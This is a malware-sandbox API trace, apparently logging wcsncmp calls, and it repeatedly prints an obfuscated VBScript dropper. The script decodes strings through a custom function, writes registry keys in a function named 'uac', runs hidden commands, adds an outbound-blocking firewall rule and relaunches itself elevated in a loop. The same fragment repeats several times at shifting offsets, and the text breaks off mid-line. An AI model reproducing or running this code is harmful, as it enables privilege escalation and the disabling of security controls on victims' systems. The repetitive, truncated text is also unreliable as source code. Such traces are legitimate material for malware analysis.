bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0226.380] wcsncmp (_String1="OTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.380] wcsncmp (_String1="TOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.380] wcsncmp (_String1="OCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.380] wcsncmp (_String1="COL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.380] wcsncmp (_String1="OL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 